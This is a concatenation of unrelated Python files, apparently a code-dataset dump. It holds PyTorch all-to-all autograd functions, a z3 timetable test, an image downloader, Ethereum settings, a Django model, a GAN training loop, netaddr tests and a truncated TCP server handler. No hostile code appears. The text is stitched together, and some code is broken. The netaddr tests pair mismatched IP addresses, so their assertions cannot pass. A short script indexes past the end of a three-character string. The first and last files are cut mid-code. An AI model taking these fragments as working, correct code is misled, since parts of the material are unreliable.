myreq.tensor = None
return (None, None, None, grad_input)
class All2All_Pooled_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
sharded_output_embeddings: Tensor,
) -> Tensor:
a2ai = myreq.a2ai
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
dim_sum_per_rank = a2ai.dim_sum_per_rank
B_local = a2ai.B_local
mixed_dim = a2ai.mixed_dim
outputs_by_rank = sharded_output_embeddings.split(
[B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank]
)
if mixed_dim:
result = torch.cat(
[output.view(B_local, -1) for output in outputs_by_rank], dim=1
)
else:
D = a2ai.D
result = torch.cat(
[output.view(B_local, -1, D) for output in outputs_by_rank], dim=1
)
return result
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
a2ai = ctx.a2ai
pg = ctx.pg
world_size = dist.get_world_size(pg)
my_rank = dist.get_rank(pg)
dim_sum_per_rank = a2ai.dim_sum_per_rank
D_local_sum = dim_sum_per_rank[my_rank]
if a2ai.mixed_dim:
(B_local, D_global_sum) = grad_output.shape
sharded_grad_input_sizes = (world_size, B_local, D_local_sum)
else:
(B_local, T_global, D) = grad_output.shape
D_global_sum = T_global * D
grad_output = grad_output.view(B_local, -1)
T_local = D_local_sum // D
sharded_grad_input_sizes = (world_size, B_local, T_local, D)
assert sum(dim_sum_per_rank) == D_global_sum
sharded_grad_output = _recat_pooled_embedding_grad_out(
grad_output.contiguous(),
dim_sum_per_rank,
)
sharded_grad_input = torch.empty(
sharded_grad_input_sizes, device=grad_output.device, dtype=grad_output.dtype
)
with record_function("## alltoall_bwd_single ##"):
req = dist.all_to_all_single(
output=sharded_grad_input,
input=sharded_grad_output,
output_split_sizes=None,
input_split_sizes=[
B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank
],
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = sharded_grad_input
# Note - this mismatch is by design! We return sharded_grad_output to allow PyTorch shape matching to proceed correctly.
return (None, None, sharded_grad_output)
class All2All_Seq_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllSequenceInfo,
sharded_input_embeddings: Tensor,
) -> Tensor:
world_size = dist.get_world_size(pg)
my_rank = dist.get_rank(pg)
D = a2ai.embedding_dim
forward_recat_tensor = a2ai.forward_recat_tensor
lengths_after_sparse_data_all2all = a2ai.lengths_after_sparse_data_all2all * D
input_splits = [i * D for i in a2ai.output_splits]
output_splits = [i * D for i in a2ai.input_splits]
local_T = lengths_after_sparse_data_all2all.shape[0]
if local_T > 0:
with record_function("## alltoall_seq_embedding_fwd_permute ##"):
(
permuted_lengths_after_sparse_data_all2all,
sharded_input_embeddings,
_,
) = torch.ops.fbgemm.permute_sparse_data(
forward_recat_tensor,
lengths_after_sparse_data_all2all.view(local_T * world_size, -1),
sharded_input_embeddings.view(-1),
None,
sharded_input_embeddings.numel(),
)
else:
permuted_lengths_after_sparse_data_all2all = None
sharded_output_embeddings = torch.empty(
sum(output_splits),
dtype=sharded_input_embeddings.dtype,
device=sharded_input_embeddings.device,
)
with record_function("## alltoall_seq_embedding_fwd_single ##"):
req = dist.all_to_all_single(
output=sharded_output_embeddings,
input=sharded_input_embeddings,
output_split_sizes=output_splits,
input_split_sizes=input_splits,
group=pg,
async_op=True,
)
a2ai.permuted_lengths_after_sparse_data_all2all = (
permuted_lengths_after_sparse_data_all2all
)
a2ai.input_splits = input_splits
a2ai.output_splits = output_splits
myreq.req = req
myreq.tensor = sharded_output_embeddings
myreq.a2ai = a2ai
myreq.wait_function = All2All_Seq_Req_Wait
ctx.myreq = myreq
ctx.pg = pg
ctx.my_rank = my_rank
ctx.world_size = world_size
return sharded_output_embeddings
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused) -> Tuple[None, None, None, Tensor]:
myreq = ctx.myreq
a2ai = myreq.a2ai
D = a2ai.embedding_dim
backward_recat_tensor = a2ai.backward_recat_tensor
permuted_lengths_after_sparse_data_all2all = (
a2ai.permuted_lengths_after_sparse_data_all2all
)
myreq.req.wait()
sharded_grad_input = myreq.tensor
myreq.req = None
myreq.tensor = None
if permuted_lengths_after_sparse_data_all2all is not None:
with record_function("## alltoall_seq_embedding_bwd_permute ##"):
_, sharded_grad_input, _ = torch.ops.fbgemm.permute_sparse_data(
backward_recat_tensor,
permuted_lengths_after_sparse_data_all2all,
sharded_grad_input,
None,
sharded_grad_input.numel(),
)
return (None, None, None, sharded_grad_input.view(-1, D))
class All2All_Seq_Req_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
sharded_output_embeddings: Tensor,
) -> Tensor:
a2ai = myreq.a2ai
D = a2ai.embedding_dim
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
return sharded_output_embeddings.view(-1, D)
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, sharded_grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
a2ai = ctx.a2ai
pg = ctx.pg
input_splits = a2ai.output_splits
output_splits = a2ai.input_splits
sharded_grad_input = torch.empty(
sum(output_splits),
device=sharded_grad_output.device,
dtype=sharded_grad_output.dtype,
)
with record_function("## alltoall_seq_embedding_bwd_single ##"):
req = dist.all_to_all_single(
output=sharded_grad_input,
input=sharded_grad_output.view(-1),
output_split_sizes=output_splits,
input_split_sizes=input_splits,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = sharded_grad_input
# Note - this mismatch is by design! We return sharded_grad_output
# to allow PyTorch shape matching to proceed correctly.
return (None, None, sharded_grad_output.view(-1))
class All2Allv_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllVInfo,
inputs: List[Tensor],
) -> Tensor:
input_split_sizes = [m * sum(a2ai.D_local_list) for m in a2ai.B_local_list]
output_split_sizes = [a2ai.B_local * e for e in a2ai.dims_sum_per_rank]
input = torch.cat(inputs, dim=1).view([-1])
output = input.new_empty(sum(output_split_sizes))
with record_function("## alltoallv_bwd_single ##"):
req = dist.all_to_all_single(
output,
input,
output_split_sizes,
input_split_sizes,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = output
myreq.wait_function = All2Allv_Wait
a2ai.input_split_sizes = input_split_sizes
a2ai.output_split_sizes = output_split_sizes
myreq.a2ai = a2ai
ctx.a2ai = a2ai
ctx.myreq = myreq
return output
@staticmethod
# pyre-fixme[3]: Return type must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *grad_output):
a2ai = ctx.a2ai
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_input = myreq.tensor
grad_inputs = grad_input.view([a2ai.B_global, -1]).split(
a2ai.D_local_list, dim=1
)
grad_inputs = [gin.contiguous() for gin in grad_inputs]
myreq.tensor = None
return (None, None, None, *grad_inputs)
class All2Allv_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def forward(ctx, pg: dist.ProcessGroup, myreq, output) -> Tuple[Tensor]:
a2ai = myreq.a2ai
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
outputs = tuple(
[
out.view([a2ai.B_local, -1])
for out in output.split(a2ai.output_split_sizes)
]
)
return outputs
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *grad_outputs) -> Tuple[None, None, Tensor]:
pg = ctx.pg
myreq = ctx.myreq
a2ai = ctx.a2ai
grad_outputs = [gout.contiguous().view([-1]) for gout in grad_outputs]
grad_output = torch.cat(grad_outputs)
grad_input = grad_output.new_empty([a2ai.B_global * sum(a2ai.D_local_list)])
with record_function("## alltoall_bwd_single ##"):
req = dist.all_to_all_single(
grad_input,
grad_output,
a2ai.input_split_sizes,
a2ai.output_split_sizes,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = grad_input
return (None, None, grad_output)
class ReduceScatter_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
rsi: ReduceScatterInfo,
*inputs: Any,
) -> Tensor:
my_rank = dist.get_rank(pg)
output = inputs[my_rank].new_empty(
inputs[my_rank].size(),
dtype=inputs[my_rank].dtype,
device=inputs[my_rank].device,
)
with record_function("## reduce_scatter ##"):
req = dist.reduce_scatter(output, list(inputs), group=pg, async_op=True)
myreq.req = req
myreq.tensor = output
myreq.wait_function = ReduceScatter_Wait
myreq.rsi = rsi
ctx.myreq = myreq
ctx.pg = pg
return output
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused: Tensor) -> Tuple[Optional[Tensor], ...]:
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_inputs = list(myreq.tensor)
# Make it equivalent to running on a single rank.
if GRADIENT_DIVISION:
for grad_input in grad_inputs:
grad_input.div_(dist.get_world_size(ctx.pg))
myreq.tensor = None
return (None, None, None, *grad_inputs)
class ReduceScatter_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
output: Tensor,
) -> Tensor:
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.myreq = myreq
ctx.pg = pg
return output
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
rsi = myreq.rsi
grad_inputs = [
grad_output.new_empty(
in_size,
dtype=grad_output.dtype,
device=grad_output.device,
)
for in_size in rsi.input_sizes
]
with record_function("## reduce_scatter_bw (all_gather) ##"):
req = dist.all_gather(
grad_inputs,
grad_output.contiguous(),
group=ctx.pg,
async_op=True,
)
myreq.req = req
myreq.tensor = grad_inputs
return (None, None, grad_output)
|
StarcoderdataPython
|
113320
|
'''
For semester 1
Experiment to see if randomizing the queries will result in a new timetable
Note that this is not a strict requirement
'''
import unittest
import sys
from z3 import *
sys.path.append('../nusmodsplanner')
import queryParserBV
import querySolverBV
import mod_utils
import random
SEMESTER = 'AY1718S1'
def isScheduleSame(t1, t2):
t1.sort()
t2.sort()
return str(t1) == str(t2)
class TestQueryParserBV(unittest.TestCase):
def setUp(self):
self.calendarUtils = mod_utils.CalendarUtils(SEMESTER)
# def testModUtilsShuffle(self):
# a = self.calendarUtils.queryAndTransform('CS1010');
# # print a
def testisScheduleSame(self):
testSchedule = ['GEQ1000_Tutorial_56', 'CS1010_Sectional Teaching_31',
'CS1010_Tutorial_C04', 'MA1102R_Laboratory_B11',
'MA1102R_Tutorial_T09', 'MA1102R_Lecture_SL1',
'MA1101R_Laboratory_B08', 'MA1101R_Tutorial_T17', 'MA1101R_Lecture_SL1']
self.assertTrue(isScheduleSame(testSchedule, testSchedule))
def testSpecificAndNonSpecificFreedays(self):
''' Verify that timetable contains the specified free day and another soft free day
'''
compMods = ['CS2100', 'CS1010', 'GEQ1000', 'GER1000']
optMods = []
options = {'numFreedays': 2, 'freedays': ['Tuesday']}
timetable1 = querySolverBV.solveQuery(4, compMods, [], options, semester = SEMESTER)
print timetable1
# random.shuffle(compMods)
# print compMods
timetable2 = querySolverBV.solveQuery(4, compMods, [], options, semester = SEMESTER)
print timetable2
print isScheduleSame(timetable1, timetable2)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
3278624
|
<gh_stars>1-10
word = 'tin'
print(word[0])
print(word[1])
print(word[2])
print(word[3])
|
StarcoderdataPython
|
1605170
|
# -*- coding: utf-8 -*-
import io
import uuid
import os
import requests
from PIL import Image
class DownloadImage:
def makeFilename(self, imgUrl):
ext = os.path.splitext(imgUrl)
uniqueid = uuid.uuid1()
filename = str(uniqueid) + ext[1]
path = self.makePath()
return {'re_filename':path['re_path'] +'/'+filename, 'ab_filename' : path['ab_path'] +'/'+filename}
def makePath(self):
path = os.getcwd() + '/cover';
if not os.path.exists(path):
os.mkdir(path)
return {'re_path':path, 'ab_path':'/cover'}
def download(self, imgUrl):
try:
response = requests.get(imgUrl)
image = Image.open(io.BytesIO(response.content))
file = self.makeFilename(imgUrl)
image.save(file['re_filename'])
return file['ab_filename']
except Exception as err:
#这里会出错 图片读取不到的时候 会报错 还有就是报cannot write mode RGBA as JPEG
print(err)
return None
if __name__ == '__main__':
do = DownloadImage()
url = 'http://www.shuquge.com/files/article/image/83/83129/83129s.jpg'
do.download(url)
|
StarcoderdataPython
|
1638376
|
#!/usr/bin/python3
import os
RPC_ETHEREUM_PORT = 8545
RPC_ETHEREUM_HOST = "ethereumgo"
RPC_ENDPOINT = "http://{}:{}".format(RPC_ETHEREUM_HOST, RPC_ETHEREUM_PORT)
if os.getenv("STAGE", "development") != "development":
WS_ETHEREUM_PORT = 8546
else:
WS_ETHEREUM_PORT = 8545
WS_ENDPOINT = "ws://{}:{}".format(RPC_ETHEREUM_HOST, WS_ETHEREUM_PORT)
|
StarcoderdataPython
|
42805
|
<reponame>plumdog/mainstay_kanban<filename>models.py
from django.db import models
from mainstay.models import UpdatedAndCreated
class TaskUsersManager(models.Manager):
def for_user(self, user):
return self.get_queryset().filter(models.Q(user=user) | models.Q(user=None))
class Task(UpdatedAndCreated, models.Model):
name = models.CharField(max_length=200)
content = models.TextField()
user = models.ForeignKey('auth.User', blank=True, null=True)
delegated_by = models.ForeignKey('auth.User', blank=True, null=True, related_name='delegated_tasks')
started_at = models.DateTimeField(blank=True, null=True)
completed_at = models.DateTimeField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
objects = TaskUsersManager()
|
StarcoderdataPython
|
1624
|
<gh_stars>1-10
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
from Training import functions
from Training.imresize import imresize
import matplotlib.pyplot as plt
from Models.pix2pixHD_base import GANLoss, VGGLoss
from Models.pix2pixHD2 import mask2onehot
class Losses():
def __init__(self, opt):
self.criterionGAN = GANLoss(not opt.no_lsgan)
self.criterionFeat = nn.L1Loss()
if opt.contour:
self.crossEntropy = nn.BCEWithLogitsLoss()
else:
self.crossEntropy = nn.CrossEntropyLoss()
if not opt.no_vgg_loss:
self.criterionVGG = VGGLoss()
def train_single_scale(dataloader, netD, netG, netS, reals, Gs, Ss, in_s, in_s_S, NoiseAmp, NoiseAmpS, opt):
'''
:param netD: currD
:param netG: currG
:param netS: currS
:param reals: a list of image pyramid ## TODO: you can just pass image shape here
:param Gs: list of prev netG
:param Ss: list of prev netS
:param in_s: 0-> all zero [1, 3, 26, 26]
:param NoiseAmp: [] -> [1]
:param opt: config
:return:
'''
loss = Losses(opt)
real = reals[opt.scale_num] # find the current level image xn
opt.nzx = real[0]
opt.nzy = real[1]
# z_opt = 0 ## dummy z_opt
alpha = opt.alpha
# setup optimizer
optimizerD = optim.Adam(netD.parameters(), lr=opt.lr_d, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam(netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999))
optimizerS = optim.Adam(netS.parameters(), lr=opt.lr_s, betas=(opt.beta1, 0.999))
schedulerD = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerD, milestones=[opt.niter * 0.8], gamma=opt.gamma)
schedulerG = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerG, milestones=[opt.niter * 0.8], gamma=opt.gamma)
schedulerS = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerS, milestones=[opt.niter * 0.8],
gamma=opt.gamma)
errD2plot = []
errG2plot = []
D_real2plot = []
D_fake2plot = []
for epoch in range(opt.niter): # niter = 2000
if Gs == [] and Ss == []:
noise_ = functions.generate_noise([1, opt.nzx, opt.nzy], opt.batchSize) # [None, 1, 32, 32]
noise_ = noise_.expand(opt.batchSize, 3, opt.nzx, opt.nzy)
## Noise_: for generated false samples through generator
else:
noise_ = functions.generate_noise([1, opt.nzx, opt.nzy], opt.batchSize)
for j, data in enumerate(dataloader):
data['image'] = data['image'].to(opt.device)
data['label'] = data['label'].long().to(opt.device)
############################
# (1) Update D network: maximize D(x) + D(G(z))
###########################
# train with real
netD.zero_grad()
pred_real = netD(data['image'], data['label'][:,0:1,...])
loss_D_real = loss.criterionGAN(pred_real, True)
D_x = loss_D_real.item()
# train with fake
if (j == 0) & (epoch == 0): # first iteration training in this level
if Gs == [] and Ss == []:
prev = torch.full([opt.batchSize, opt.nc_z, opt.nzx, opt.nzy], 0, device=opt.device)
in_s = prev # full of 0 [None, 3, 32, 32]
prev_S = torch.full([opt.batchSize, opt.label_nc, opt.nzx, opt.nzy], 0, device=opt.device)
in_s_S = prev_S # full of 0 [None, 4, 32, 32]
mask = data['label'][:,0:1,...]
opt.noise_amp = opt.noise_amp_init
opt.noise_amp_S = opt.noise_amp_init
else:
prev = draw_concat(Gs, data['down_scale_label'], reals, NoiseAmp, in_s, 'generator', opt)
## given a new noise, prev is a image generated by previous Generator with bilinear upsampling [1, 3, 33, 33]
criterion = nn.MSELoss()
RMSE = torch.sqrt(criterion(data['image'], prev))
opt.noise_amp = opt.noise_amp_init * RMSE
prev_S = draw_concat(Ss, data['down_scale_image'], reals, NoiseAmpS, in_s_S, 'segment', opt) ## prob with [None, 4, 32, 32]
onehot_label = mask2onehot(data['label'][:,0:1,...], opt.label_nc)
RMSE_S = torch.sqrt(criterion(onehot_label, prev_S))
# RMSE_S = 0
opt.noise_amp_S = opt.noise_amp_init * RMSE_S
mask = data['label'][:,0:1,...]
else:
prev = draw_concat(Gs, data['down_scale_label'], reals, NoiseAmp, in_s, 'generator', opt)
prev_S = draw_concat(Ss, data['down_scale_image'], reals, NoiseAmpS, in_s_S, 'segment', opt)
mask = data['label'][:,0:1,...]
if Gs == []:
noise = noise_ ## Gausiaan noise for generating image [None, 3, 42, 42]
else:
noise = opt.noise_amp * noise_ + prev ## [None, 3, 43, 43] new noise is equal to the prev generated image plus the gaussian noise.
fake = netG(noise.detach(), prev, mask) # [None, 3, 32, 32] the same size with the input image
# detach() make sure that the gradients don't go to the noise.
# prev:[None, 3, 42, 42] -> [None, 3, 43, 43] first step prev = 0, second step prev = a image generated by previous Generator with bilinaer upsampling
pred_fake = netD(fake.detach(), data['label'][:,0:1,...]) # output shape [1, 1, 16, 16] -> [1, 1, 23, 23]
# print(len(pred_fake), len(pred_fake[0]))
loss_D_fake = loss.criterionGAN(pred_fake, False)
D_G_z = loss_D_fake.item()
# segment_logit, segment_mask = netS(data['image'], mask2onehot(prev_S, opt.label_nc))
# print(data['image'].shape, onehot.shape)
# print(epoch, j)
segment_logit, segment_prob, segment_mask = netS(data['image'], prev_S.detach())
pred_fake_S = netD(data['image'], segment_prob.detach())
loss_D_fake_S = loss.criterionGAN(pred_fake_S, False)
D_S_z = loss_D_fake_S.item()
errD = (loss_D_real + 0.5 * loss_D_fake + 0.5 * loss_D_fake_S) ## Todo: figure out a proper coefficient
errD.backward()
optimizerD.step()
errD2plot.append(errD.detach()) ## errD for each iteration
############################
# (2) Update G network: maximize D(G(z))
###########################
netG.zero_grad()
pred_fake = netD(fake, data['label'][:,0:1,...])
loss_G_GAN = 0.5 * loss.criterionGAN(pred_fake, True)
# GAN feature matching loss
loss_G_GAN_Feat = 0
if not opt.no_ganFeat_loss:
feat_weights = 4.0 / (opt.n_layers_D + 1)
D_weights = 1.0 / opt.num_D
for i in range(opt.num_D):
for j in range(len(pred_fake[i]) - 1):
loss_G_GAN_Feat += D_weights * feat_weights * \
loss.criterionFeat(pred_fake[i][j],
pred_real[i][j].detach()) * opt.lambda_feat
# VGG feature matching loss
loss_G_VGG = 0
if not opt.no_vgg_loss:
loss_G_VGG = loss.criterionVGG(fake, data['image']) * opt.lambda_feat
## reconstruction loss
if alpha != 0: ## alpha = 10 calculate the reconstruction loss
Recloss = nn.MSELoss()
rec_loss = alpha * Recloss(fake, data['image'])
else:
rec_loss = 0
errG = loss_G_GAN + loss_G_GAN_Feat + loss_G_VGG + rec_loss
errG.backward()
optimizerG.step()
############################
# (3) Update S network: maximize D(S(z))
###########################
netS.zero_grad()
pred_fake_S = netD(data['image'], segment_prob)
loss_G_GAN_S = 0.03 * loss.criterionGAN(pred_fake_S, True)
# Segmentation loss
if opt.contour:
loss_G_Seg = loss.crossEntropy(segment_logit, data['label'].float())
else:
loss_G_Seg = loss.crossEntropy(segment_prob, torch.squeeze(data['label'][:,0:1,...], dim =1))
# GAN feature matching loss
loss_G_GAN_Feat_S = 0
if not opt.no_ganFeat_loss:
feat_weights = 4.0 / (opt.n_layers_D + 1)
D_weights = 1.0 / opt.num_D
for i in range(opt.num_D):
for j in range(len(pred_fake_S[i]) - 1):
loss_G_GAN_Feat_S += D_weights * feat_weights * \
loss.criterionFeat(pred_fake_S[i][j],
pred_real[i][j].detach()) * opt.lambda_feat
errS = loss_G_GAN_S + loss_G_GAN_Feat_S + loss_G_Seg
errS.backward()
optimizerS.step()
## for every epoch, do the following:
errG2plot.append(errG.detach()) ## ErrG for each iteration
D_real2plot.append(D_x) ## discriminator loss on real
D_fake2plot.append(D_G_z + D_S_z) ## discriminator loss on fake
if epoch % 25 == 0 or epoch == (opt.niter - 1):
print('scale %d:[%d/%d]' % (opt.scale_num, epoch, opt.niter))
if epoch % 25 == 0 or epoch == (opt.niter - 1):
plt.imsave('%s/fake_sample_%d.png' % (opt.outf, epoch),
functions.convert_image_np(fake.detach()), vmin=0, vmax=1)
plt.imsave('%s/fake_sample_real_%d.png' % (opt.outf, epoch),
functions.convert_image_np(data['image']), vmin=0, vmax=1)
plt.imsave('%s/fake_sample_mask_%d.png' % (opt.outf, epoch),
functions.convert_mask_np(data['label'][:,0:1,...], num_classes= opt.label_nc))
plt.imsave('%s/segmentation_mask_%d.png' % (opt.outf, epoch),
functions.convert_mask_np(segment_mask.detach(), num_classes=opt.label_nc))
schedulerD.step()
schedulerG.step()
schedulerS.step()
functions.save_networks(netG, netD, netS, opt) ## save netG, netD, z_opt, opt is used to parser output path
return in_s, in_s_S, netG, netS
def draw_concat(Gs, masks, reals, NoiseAmp, in_s, mode, opt):
'''
:param Gs: [G0]
:param mask: [down scaled _mask]
:param reals: [image pyramid] only used to represent the image shape
:param NoiseAmp: [1]
:param in_s: all zeros [1, 3, 26, 26]
:param mode: 'rand'
:param opt:
:return:
'''
G_z = in_s[:opt.batchSize, :, :, :] # [None, 3, 26, 26] all zeros, image input for the corest level
if len(Gs) > 0:
if mode == 'generator':
count = 0
for G, mask, real_curr, real_next, noise_amp in zip(Gs, masks, reals, reals[1:], NoiseAmp):
if count == 0:
z = functions.generate_noise([1, real_curr[0], real_curr[1]],
opt.batchSize)
z = z.expand(opt.batchSize, G_z.shape[1], z.shape[2], z.shape[3])
else:
z = functions.generate_noise(
[opt.nc_z, real_curr[0], real_curr[1]], opt.batchSize)
G_z = G_z[:, :, 0:real_curr[0], 0:real_curr[1]] ## G_z [None, 3, 32, 32]
z_in = noise_amp * z + G_z
G_z = G(z_in.detach(), G_z, mask) ## [1, 3, 26, 26] output of previous generator
G_z = imresize(G_z, real_next[1] / real_curr[1], opt)
G_z = G_z[:, :, 0:real_next[0],
0:real_next[1]] ## resize the image to be compatible with current G [1, 3, 33, 33]
count += 1
elif mode == 'segment':
count = 0
for G, mask, real_curr, real_next, noise_amp in zip(Gs, masks, reals, reals[1:], NoiseAmp):
G_z = G_z[:, :, 0:real_curr[0], 0:real_curr[1]] ## G_z [None, 3, 32, 32]
_, G_z, _ = G(mask, G_z) ## [1, 3, 26, 26] output of previous generator
if opt.contour:
G_z = torch.cat((G_z, 1-G_z), 1)
G_z = imresize(G_z, real_next[1] / real_curr[1], opt)
G_z = G_z[:, :, 0:real_next[0],
0:real_next[1]] ## resize the image to be compatible with current G [1, 3, 33, 33]
count += 1
return G_z
|
StarcoderdataPython
|
3397520
|
import unittest
from netaddr import IPRange, IPAddress
from netaddr_extensions import funcs
from netaddr_extensions import classes
class FuncsTestCase(unittest.TestCase):
def test_bool_funcs(self):
self.assertTrue(funcs.is_netmask('255.255.255.0'))
self.assertFalse(funcs.is_netmask('127.0.0.1'))
self.assertTrue(funcs.is_prefix('24'))
self.assertFalse(funcs.is_prefix('33'))
range1 = IPRange('127.0.0.1', '127.0.0.100')
range2 = IPRange('127.0.0.99', '127.0.0.200')
range3 = IPRange('127.0.2.1', '127.0.2.100')
range4 = IPRange('127.0.2.101', '127.0.2.200')
range5 = IPRange('127.0.0.3', '127.0.0.99')
self.assertTrue(funcs.range_overlap(range1, range2))
self.assertFalse(funcs.range_overlap(range3, range4))
self.assertTrue(funcs.range_in_range(range5, range1))
self.assertFalse(funcs.range_in_range(range2, range1))
def test_conversions(self):
self.assertEqual(funcs.prefix_to_netmask(24), IPAddress('255.255.255.0'))
self.assertRaises(ValueError, funcs.prefix_to_netmask(33))
self.assertEqual(funcs.netmask_to_prefix('255.255.255.224'), 27)
self.assertEqual(funcs.netmask_to_hosts(24), 256)
self.assertEqual(funcs.netmask_to_hosts('255.255.255.224'), 32)
def test_validate(self):
self.assertIsNone(funcs.validate_cidr('127.0.0.1/27'))
self.assertRaises(ValueError, funcs.validate_cidr, '255.255.255.0/24')
self.assertRaises(ValueError, funcs.validate_cidr, 'random text')
def test_range(self):
self.assertRaises(ValueError, funcs.get_address_range, '127.0.0.1')
self.assertEqual(funcs.get_address_range(
'127.0.0.0/23'),
['127.0.0.0', '127.0.1.255']
)
self.assertEqual(funcs.get_address_range(
'127.0.0.65/27'),
['127.0.0.65', '127.0.0.96'])
class IrregularClassTest(unittest.TestCase):
def setUp(self):
# Enter the gateway address and prefix / netmask
self.irreg = classes.IrregularRange('172.16.17.32/27')
self.irreg2 = classes.IrregularRange('172.16.31.10/24')
self.irreg3 = classes.IrregularRange('192.168.127.12/27')
def test_properties(self):
irreg = self.irreg
irreg2 = self.irreg2
irreg3 = self.irreg3
self.assertIn('172.16.17.32', irreg)
self.assertEqual('172.16.17.32', irreg.first_addr)
self.assertEqual('192.168.127.12', irreg.last_addr)
self.assertEqual('192.168.3.11', irreg2.last_addr)
self.assertEqual('192.168.3.11', irreg3.last_addr)
self.assertEqual(irreg.network_ip, '172.16.17.32')
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1798849
|
<reponame>p3g4asus/orvpy
import sys
import traceback
import threading
import logging
from util import init_logger, tohexs, s2b, uunq
from dataparser import RoughParser
import select
import socket
import time
import abc
import event
import json
from device.devicect10 import SendBufferTimer
from action import ActionPing, RV_DATA_WAIT
_LOGGER = init_logger(__name__, level=logging.DEBUG)
if sys.version_info < (3, 0):
import SocketServer
import SimpleHTTPServer
else:
long = int
import socketserver as SocketServer
import http.server as SimpleHTTPServer
class TCPServerHandler(SocketServer.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
# def __init__(self):
# super(ServerHandler,self).__init__()
# self.stopped = True
def stop(self):
self.stopped = True
if self.request is not None:
try:
self.request.close()
self.request = None
except: # noqa: E722
_LOGGER.warning(f"{traceback.format_exc()}")
def handle(self):
self.stopped = False
keyv = '{}:{}'.format(*self.client_address)
threading.currentThread().name = ("TCPServerHandler")
_LOGGER.info(keyv + " connected")
self.request.setblocking(0)
olddata = b''
serv = self.server.s
serv.setclienthandler(self.client_address, self)
wlist = []
remain = b''
disconnectat = 0
parser = RoughParser()
while not serv.stopped and not self.stopped:
try:
ready = select.select([self.request], wlist, [], 0.5)
if disconnectat > 0 and time.time() >= disconnectat:
break
if ready[0]:
data = self.request.recv(4096)
if len(data) > 0:
_LOGGER.info(
"RTCP [" + keyv + "/" + str(len(data)) + "] <-" + tohexs(data))
data = olddata + data
while True:
dictout = parser.parse(
serv.getclientinfo(self.client_address), data)
rv = dictout['idxout']
if 'disconnecttimer' in dictout:
disconnectat = dictout['disconnecttimer']
if 'reply' in dictout:
remain += dictout['reply']
del dictout['reply']
if rv and rv > 0:
tp = dictout['type']
if tp == b"mfz" or tp == b"cry":
serv.setclientinfo(
self.client_address, dictout)
data = data[rv:]
if len(data):
continue
elif rv == RoughParser.DISCARD_BUFFER:
data = b''
break
olddata = data
else:
raise Exception("Readline failed: connection closed?")
if ready[1] or len(wlist) == 0:
if len(remain) == 0:
remain = serv.dowrite(self.client_address)
if len(remain) > 0:
_LOGGER.info("Sending packet to %s:%d" %
self.client_address)
nb = self.request.send(remain)
_LOGGER.info("Sent")
# if tp=="cry":
